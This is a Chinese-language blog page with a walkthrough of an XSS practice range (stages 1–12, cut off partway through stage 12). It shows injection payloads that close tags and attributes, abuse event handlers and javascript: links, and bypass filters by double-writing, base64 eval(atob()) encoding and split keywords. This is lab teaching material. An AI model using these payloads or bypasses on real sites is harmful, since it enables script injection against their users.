<!DOCTYPE html>
<html lang="en">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/微信图片_20200713154033.jpg">
  <link rel="icon" type="image/png" href="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/微信图片_20200713154033.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>xss-challgens通关记录 - SuQieR&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_yg9cfy8wd6.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
<meta name="generator" content="Hexo 4.2.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>SuQieR's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                主页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827064005.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2020-08-07 06:14">
      August 7, 2020 am
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      61
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h1 id="xss-challgens"><a href="#xss-challgens" class="headerlink" title="xss-challgens"></a>xss-challgens</h1><h3 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h3><ul>
<li><a href="https://xss-quiz.int21h.jp" target="_blank" rel="noopener">xss-challgens</a>， 一个日本安全研究员开发的xss靶场，官方推荐配合ie使用。（ie有多垃圾，谁用谁知道）</li>
<li>这里的环境用的是firefox+ietest,部分关卡没有特殊版本的ie可能做不出来。</li>
</ul>
<h2 id="stage1-无过滤的xss"><a href="#stage1-无过滤的xss" class="headerlink" title="stage1-无过滤的xss"></a>stage1-无过滤的xss</h2><ul>
<li><p>探测漏洞，随便输入一段不可能冲突的字符串，提交后F12查看源代码</p>
<table>
<thead>
<tr>
<th align="center"><code>发现用户的输出会直接嵌入到标签中，那么就可以存在xss漏洞</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827040351.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>闭合文本标签，触发xss</p>
<ul>
<li>从网页源代码可以看到用户的输入被b标签和引号围了起来。插入XSS代码的时候可以将b标签闭合</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>111&quot;&lt;/b&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827040522.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center">从上图可以看到b标签把1111给闭合了，且下面就是XSS代码</td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="stage2-属性中的xss"><a href="#stage2-属性中的xss" class="headerlink" title="stage2-属性中的xss"></a>stage2-属性中的xss</h2><ul>
<li>输入字符串，发现没响应信息，F12搜索一波</li>
</ul>
<table>
<thead>
<tr>
<th align="center">发现字符串发现被当作input标签的属性作为输出</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827040907.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>闭合input属性的引号及尖括号，插入js代码</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>1111&quot;&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827041034.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>闭合input属性，插入xss事件代码<ul>
<li>onmouseover 事件会在鼠标指针移动到指定的元素上时发生。</li>
</ul>
</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>aaaaa&quot;onmouseover=alert(document.domain)&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827041823.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>当鼠标放到输入框上时，会自动弹出域名</code></td>
</tr>
</tbody></table>
<h2 id="stage3-选择列表中的xss"><a href="#stage3-选择列表中的xss" class="headerlink" title="stage3-选择列表中的xss"></a>stage3-选择列表中的xss</h2><ul>
<li>html select标签介绍</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>select 元素可创建单选或多选菜单</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827042042.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>表单介绍</li>
</ul>
<table>
<thead>
<tr>
<th><code>HTML表单用于搜集不同类型的用户输入，form中间都是表单的具体元素</code></th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827042115.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>F12查看select标签属性</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>发现select标签里嵌套了option标签</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827042409.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li><p>burpsuite截断请求，发送到repeater</p>
<ul>
<li>p1进行了过滤，p2在代码上做了长度限制，只能修改数据包插入xss payload</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>&lt;/option&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827042907.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>插入后看不知道是否弹出窗口</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>右键浏览器打开</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827043017.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="center">触发弹窗</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827043100.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="stage4-隐藏参数中的xss"><a href="#stage4-隐藏参数中的xss" class="headerlink" title="stage4-隐藏参数中的xss"></a>stage4-隐藏参数中的xss</h2><ul>
<li><p>HTML隐藏表单介绍</p>
<ul>
<li>隐藏域是用来手机或发送信息的不可见元素，对于网页的访问者来说，隐藏域是看不见的。当表单被提交时，隐藏域就会将信息用你设置时定义的名称和值发送到服务器上</li>
<li>代码格式 <code>&lt;input type=&#39;hidden&#39;name=&quot;...&quot;value=&quot;...&quot;&gt;</code></li>
<li>F12查看源代码</li>
</ul>
<table>
<thead>
<tr>
<th>发现两个hidden类型，名为p3</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827043413.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>HTML中svg标签介绍</p>
<ul>
<li>VG使用XML格式定义图像</li>
<li>SVG文件可通过以下标签嵌入HTML文档:<code>&lt;embed&gt;,&lt;object&gt;</code>或<code>&lt;iframe&gt;</code>也可以通过SVG标签插入</li>
<li>使用方法<code>&lt;svg/事件=&quot;&quot;&gt;</code></li>
</ul>
</li>
<li><p>闭合触发xss</p>
</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>burp修改数据包，在p1插入代码发现被过滤了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827043815.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>p2也同样被过滤了，直接当作字符串输出了。在p3插入XSS代码，没有被过滤，也没有输出，F12查看源代码发现被当作属性放到hidden的value中去了</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>可以考虑闭合属性来达到插入代码的目的</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827044026.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>burp修改数据包，插入xss payload</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827044302.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="center">复制浏览器打开，触发xss漏洞，且代码插入了网页中</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827044410.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="center"><code>&quot;&gt;&lt;svg onload=alert(document.domain)&gt;%0a</code> <code>%0a为换行符少了则不触弹窗</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827044956.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<h2 id="stage5-限制长度输入的xss"><a href="#stage5-限制长度输入的xss" class="headerlink" title="stage5-限制长度输入的xss"></a>stage5-限制长度输入的xss</h2><p><strong>HTML表单文本框介绍</strong></p>
<ul>
<li>HTML表单用于搜集不同类型的用户输入。表单元素指的是不同类型的input元素，复选框，单选按钮，提交按钮等等。text定义常规文本输入</li>
<li>属性介绍：<ul>
<li>value属性规定输入字段的初始值</li>
<li>readonly属性规定输入字段为只读</li>
<li>disabled属性规定字段是禁用的，被禁用的元素不可用和不可点击。被禁用的元素不会被提交</li>
<li>size属性规定输入字段的尺寸（以字符计）</li>
<li>maxlength属性规定输入字段允许的最大长度</li>
<li>如设置maxlength属性，则输入控件 不会接收超过所允许的字符（该属性不会提供任何反馈，如果需要提醒用户，则必须编写js代码）</li>
</ul>
</li>
</ul>
<p><strong>XSS Payload长度计算</strong></p>
<table>
<thead>
<tr>
<th align="center"><code>使用python内置len(字符串)计算对应的字节数</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827045531.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<p><strong>F12审查工具修改源代码</strong></p>
<ul>
<li>正常输入，发现发现输入长度被限制了，提交唯一字符串，F12搜索</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>发现input使用了maxlength属性进行了长度的限制</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827045636.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="center"><code>双击更改maxlength属性最大值，再提交</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827045717.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>F12查看，页面源代码刷新后已经恢复了maxlength的属性，但是从下一行可以看到，不管输入多长的字符串，都会被插入到value中</code></td>
</tr>
</tbody></table>
<p><strong>合属性触发payload</strong></p>
<ul>
<li>从上图中可以看到从输入框输入的代码都会被插入到value属性中，所以需要对value进行闭合</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>1111&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827045947.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>插入后成功闭合了value属性，且在下一行插入了payload</code></td>
</tr>
</tbody></table>
<h2 id="state6-HTML事件中的xss"><a href="#state6-HTML事件中的xss" class="headerlink" title="state6-HTML事件中的xss"></a>state6-HTML事件中的xss</h2><p><strong>html事件介绍</strong></p>
<ul>
<li>在现代浏览器中都内置有大量的事件处理器，这些处理器都会监视特定的条件或用户行为，例如鼠标单击或浏览器窗口中完成加载某个图像。通过使用客户端javascript，可以将某些特定的事件处理器作为属性添加的标签，并可以在事件发生时执行一个或多个javascript命令或函数</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>常见的HTML事件的列表</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827050217.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<p><strong>闭合分析</strong></p>
<ul>
<li>提交了payload</li>
</ul>
<table>
<thead>
<tr>
<th align="center">发现被当作value的属性值插入了input标签中</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827050336.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li><p>通过HTML事件来触发XSS，<code>payload：&quot;onmouseover=&quot;alert(document.domain)</code></p>
<ul>
<li>前一个引号是闭合value的前引号，等号后面的引号闭合了value后引号，同时也是为onmouseover的值加了引号围起来</li>
</ul>
</li>
<li><p>又或者是闭合input标签，加入最简单的payload<code>&lt;script&gt;alert(document.domain)&lt;/script&gt;</code></p>
</li>
</ul>
<p><strong>触发payload</strong></p>
<ul>
<li>成功的闭合了value属性，在其后面插入了payload，当鼠标放到文本框上时，就会弹出当前域名</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>&quot;onmouseover=&quot;alert(document.domain)</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827050750.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>插入后发现尖括号全部被转义，由此可见这里进行了过滤，只能使用html中的事件来触发XSS</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>&quot;&gt; &lt;script&gt;alert(document.domain)&lt;/script&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827050849.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<h2 id="stage7-空格分割属性的xss"><a href="#stage7-空格分割属性的xss" class="headerlink" title="stage7-空格分割属性的xss"></a>stage7-空格分割属性的xss</h2><p><strong>xss探测</strong></p>
<ul>
<li><p>尝试插入了111，F12，搜索发现也是被当作value的值传入</p>
<table>
<thead>
<tr>
<th align="center"><code>使用onmouseover方法触发XSS</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827051045.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>插入后并没什么反应，F12发现在空格后的值出了一堆引号</li>
</ul>
</li>
<li><p>重新输入字符串，验证猜想，插入111 222 333</p>
<table>
<thead>
<tr>
<th align="center"><code>果不其然每个空格后的值都多出了一堆引号</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827051238.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>触发xss</strong></p>
<ul>
<li><p>源代码在空格后的值多出了一对引号，导致js代码无法正常执行</p>
<table>
<thead>
<tr>
<th align="center"><code>111&quot;onmouseover=&quot;document.domain&quot;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827051339.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>插入后多了一对字符串，将js代码转义成字符串，插入到value中去了</code></td>
</tr>
</tbody></table>
</li>
<li><p>这时候就可以把引号省略掉，让用来过滤的引号来补全js代码所</p>
<table>
<thead>
<tr>
<th align="center"><code>111 onmouseover=alert(document.domain)</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827051447.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>插入源代码会自动在onmousover后的值添加了一对引号，成功的触发了js代码</code></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="stage8-javascript伪协议触发XSS"><a href="#stage8-javascript伪协议触发XSS" class="headerlink" title="stage8-javascript伪协议触发XSS"></a>stage8-javascript伪协议触发XSS</h2><p><strong>javascript伪协议介绍</strong></p>
<ul>
<li>将javascript代码调价到客户端的方法时把它放置在伪协议说明符javascript:后的url中。这个特殊的协议类型声明了url的主题时任何的javascript代码，它由javascript的解释器运行。如果javascript:url中代码包含有多个语句，必须使用分号将这一语句分隔<ul>
<li><code>JavaScript: var now = new Date();“&lt;h1&gt;The time is:&lt;/h1&gt;+now;</code></li>
</ul>
</li>
<li>javascript url 还可以含有只执行动作，但不会有返回值的JavaScript语句。<ul>
<li><code>javascript:alert(&quot;hello world!&quot;)</code></li>
</ul>
</li>
</ul>
<p><strong>探测xss</strong></p>
<ul>
<li>输入独一无二字符串提交，在响应中寻找。</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>输入了1111，可以看到不仅将1111用a标签括住，还将1111当作a标签的href属性进行插入</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827051804.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<p><strong>a链接标签属性href介绍</strong></p>
<ul>
<li><a>标签定义超链接，用于从一个页面转到另一个页面</li>
<li><a>元素最重要的属性的href属性，它指定了链接的目标</li>
<li>在所有浏览器中，链接的默认外观如下<ul>
<li>违背访问的链接带有下划线而且是蓝色的</li>
<li>已被访问的链接带有下划线而且是紫色的</li>
<li>活动链接带有下划线而且是红色的</li>
</ul>
</li>
</ul>
<p><strong>payload触发XSS</strong></p>
<table>
<thead>
<tr>
<th align="center"><code>javascript:alert(document.domain)</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827051924.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>当前页面会将用户所输入的内容当作a标签的href属性的值，点击url的时候就会弹出当前域名</code></td>
</tr>
</tbody></table>
<h2 id="stage9-略过这关"><a href="#stage9-略过这关" class="headerlink" title="stage9-略过这关"></a>stage9-略过这关</h2><ul>
<li>这关是关于utf-7的xss漏洞，由于现在新版浏览器都是使用的utf-8，所以直接跳过。</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>定位到hint，在其后面添加代码弹出域名跳过第九关</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827052124.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th><code>在id后面添加onclick=&quot;alert(document.domain)&quot;,通过作弊来跳过第九关</code></th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827052207.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<h2 id="state10-绕过domain过滤的xss"><a href="#state10-绕过domain过滤的xss" class="headerlink" title="state10-绕过domain过滤的xss"></a>state10-绕过domain过滤的xss</h2><ul>
<li><p>上来就是恶意字符，接着查询源代码。</p>
<table>
<thead>
<tr>
<th align="center"><code>在源代码中查询，发现也是同样将用户的输入作为value的值进行插入</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827052641.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>通过闭合value标签来触发xss，插入后发现domain不见了</p>
<table>
<thead>
<tr>
<th align="center"><code>说明被过滤了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827052725.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>双写绕过</strong></p>
<ul>
<li><p>源代码对用户输入的domain进行了过滤，是通过判断domain字符是否出来进行了，且只进行了一次判断，那么可以采用双写绕过</p>
<table>
<thead>
<tr>
<th align="center"><code>111&quot;&gt;&lt;script&gt;alert(document.domadomainin)&lt;/script&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827052810.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>双写可以绕过，弹出了域名</code></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>编码绕过</strong></p>
<ul>
<li><p>源代码只是对字符串进行了过滤，还可以采用编码来绕过过滤</p>
<pre><code class="hljs javascript">payload：<span class="hljs-number">1111</span><span class="hljs-string">"&gt;&lt;script&gt;eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))&lt;/script&gt;</span></code></pre>

<ul>
<li>eval() 函数计算 JavaScript 字符串，并把它作为脚本代码来执行。主要是执行atob函数</li>
<li>atob() 方法用于解码base64字符串</li>
<li>这段payload主要是调用eval函数执行atob函数解码base64字符</li>
<li>使用burpsuite的decoder功能对<code>alert(document.domain)</code>进行base64加密得到<code>YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==</code>,将其用eval(atob())函数执行</li>
</ul>
</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>成功弹出域名</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827053230.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<h2 id="stage11-绕过替换script及on事件的xss"><a href="#stage11-绕过替换script及on事件的xss" class="headerlink" title="stage11-绕过替换script及on事件的xss"></a>stage11-绕过替换script及on事件的xss</h2><ul>
<li><p>检测字符串位置</p>
<table>
<thead>
<tr>
<th align="center"><code>构造恶意字符串,F12查找</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827053827.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>发现过滤</strong></p>
<ul>
<li><p>通过闭合input标签来插入payload</p>
<table>
<thead>
<tr>
<th align="center"><code>现这里对scrip进行了过滤，只要匹配到script的就在前面添加x</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827053912.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>通过html事件来尝试触发XSS,同样进行了过滤</p>
<table>
<thead>
<tr>
<th><code>只要匹配到了on就将后面的字符替换为xxx，事件没有触发成功</code></th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827054001.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>伪协议绕过</strong></p>
<ul>
<li><p>通过JavaScript：url尝试进行绕过</p>
<table>
<thead>
<tr>
<th align="center"><code>&quot;&gt;&lt;a href=&quot;javascript:alert(document.domain)&gt;/xss/&lt;/a&gt;&quot;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827054112.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>插入后还想并没有执行alert()函数，从源代码可以代码也是对script进行了过滤在前面添加了x</code></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>空格绕过</strong></p>
<ul>
<li><p>在href中的JavaScript伪协议中存在空格也是会被当作JavaScript伪协议来执行的</p>
<table>
<thead>
<tr>
<th align="center"><code>&quot;&gt; &lt;a  href=&quot;javascr    ipt:alert(document.domain)&gt;1111&lt;/a&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><code>点击输入框后面的1111就会弹出域名</code></td>
</tr>
<tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827054241.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="stage12-利用ie特性绕过xss"><a href="#stage12-利用ie特性绕过xss" class="headerlink" title="stage12-利用ie特性绕过xss"></a>stage12-利用ie特性绕过xss</h2><ul>
<li><p>插入独一无二字符，F12查找</p>
<table>
<thead>
<tr>
<th align="center"><code>插入asdfqwer，发现用户的输入被当作value的值插入了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827055414.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>尝试利用</strong></p>
<ul>
<li><p>插入 <code>1111&quot;onclick=&quot;alert(document.domain)&quot;</code>，闭合value的引号，来通过事件触发payload</p>
<table>
<thead>
<tr>
<th align="center"><code>引号被和空格都被过滤了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827055514.png" srcset="/img/loading.gif" alt=""></td>
</tr>
